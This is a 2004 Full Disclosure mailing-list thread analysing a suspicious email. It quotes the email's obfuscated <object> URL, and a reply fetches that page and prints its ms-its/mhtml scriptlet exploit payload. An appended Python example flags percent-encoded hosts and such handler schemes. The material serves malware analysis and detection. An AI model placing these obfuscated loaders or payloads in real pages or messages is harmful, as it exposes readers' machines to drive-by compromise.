Full Disclosure mailing list archives
Re: new email virus?
From: Tremaine <tremaine () gmail com>
Date: Wed, 25 Aug 2004 14:28:54 -0600
On Wed, 25 Aug 2004 14:37:18 -0400, John Nagro <john.nagro () gmail com> wrote:
> my co-worker got this in their email today... here is the body + some
> headers + the attachment... could this be a new virus? anyone else see
> anything like this?
>
> MIME-Version: 1.0
> Content-Type: multipart/mixed; boundary="--------fthllkqoljuvkhyckltf"
> X-YAVR: XML-CODEBASE
> Subject: WARNING-XML-CODEBASE-OBJECT-2
>
> ----------fthllkqoljuvkhyckltf
> Content-Type: text/html; charset="us-ascii"
> Content-Transfer-Encoding: 7bit
>
> <html><body>
> <object data="http://www.v%69k%6F%72d.com/default.htm"><br><br>
> <br>
> </body></html>
>
> ----------fthllkqoljuvkhyckltf
> Content-Type: application/octet-stream; name="1.gif"
> Content-Transfer-Encoding: base64
> Content-Disposition: attachment; filename="1.gif"
>
> NDU0NTEyMTI=
>
> ----------fthllkqoljuvkhyckltf--
>
> ------------------------------------------------------------------------
> --
> John Nagro
> john.nagro () gmail com
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
Quick snag with wget:

wget http://www.v%69k%6F%72d.com/default.htm
--14:26:50--  http://www.vikord.com/default.htm
           => `default.htm'
Resolving www.vikord.com... 194.226.217.167
Connecting to www.vikord.com[194.226.217.167]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]

    [ <=> ] 350           --.--K/s

14:26:56 (3.34 MB/s) - `default.htm' saved [350]

username@coroner ~ $ cat default.htm
<textarea id="code" style="display:none;">
<object data="ms-its:%6D%68%74%6D%6C:file://C:\drqwtt.mht!${PATH}/default.chm::/default.htm" type="text/x-scriptlet"></object>
</textarea>
<script language="javascript">
document.write(code.value.replace(/\${PATH}/g,location.href.substring(0,location.href.indexOf('default.htm'))));
</script>

Feel free to keep digging

--
Tremaine
IT Security Consultant
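Both obfuscations visible in this thread (percent-encoded letters in the hostname of the e-mail's object URL, and a percent-encoded handler name in the fetched page) can be flagged mechanically by a mail or proxy filter. The following is an added example, not part of the original post: the function names, the watched-handler list and the sample input (built from the two tags quoted above plus one benign URL) are assumptions made for illustration.

```python
import re
import string
from urllib.parse import unquote

# Constructed sample: the two <object> tags quoted in the thread, plus a benign URL.
SAMPLE_HTML = r'''
<object data="http://www.v%69k%6F%72d.com/default.htm">
<object data="ms-its:%6D%68%74%6D%6C:file://C:\drqwtt.mht!${PATH}/default.chm::/default.htm" type="text/x-scriptlet"></object>
<img src="http://example.com/a%20b.gif">
'''

# Characters that never need percent-encoding in a URL (RFC 3986, section 2.3).
UNRESERVED = set(string.ascii_letters + string.digits + "-._~")
ATTR_RE = re.compile(r'\b(?:data|src|href)\s*=\s*"([^"]+)"', re.I)
ESCAPE_RE = re.compile(r"%[0-9A-Fa-f]{2}")
# Assumption: handlers taken from the payload quoted in this thread; extend as needed.
WATCHED_HANDLERS = ("ms-its:", "mhtml:")

def needless_escapes(text):
    """Return the %XX escapes that hide characters which never need encoding."""
    return [e for e in ESCAPE_RE.findall(text) if chr(int(e[1:], 16)) in UNRESERVED]

def inspect_url(url):
    """Return (decoded_url, sorted findings) for one attribute value."""
    findings = set()
    head, sep, rest = url.partition("//")
    # Everything before "//" is the scheme / handler chain.
    if needless_escapes(head):
        findings.add("encoded-scheme")
    # The authority (host) runs from "//" to the next "/", "?" or "#".
    authority = re.split(r"[/?#]", rest, maxsplit=1)[0] if sep else ""
    if needless_escapes(authority):
        findings.add("encoded-host")
    decoded = unquote(url)
    if any(h in decoded.lower() for h in WATCHED_HANDLERS):
        findings.add("watched-handler")
    return decoded, sorted(findings)

def scan_html(html):
    """Map every data/src/href value in the HTML to its inspection result."""
    return {u: inspect_url(u) for u in ATTR_RE.findall(html)}

if __name__ == "__main__":
    for raw, (decoded, findings) in scan_html(SAMPLE_HTML).items():
        print(findings or ["clean"], decoded)
```

The `%20` in the benign URL is not reported because a space does need encoding; only escapes that hide ordinary letters, digits or `-._~` count as obfuscation here.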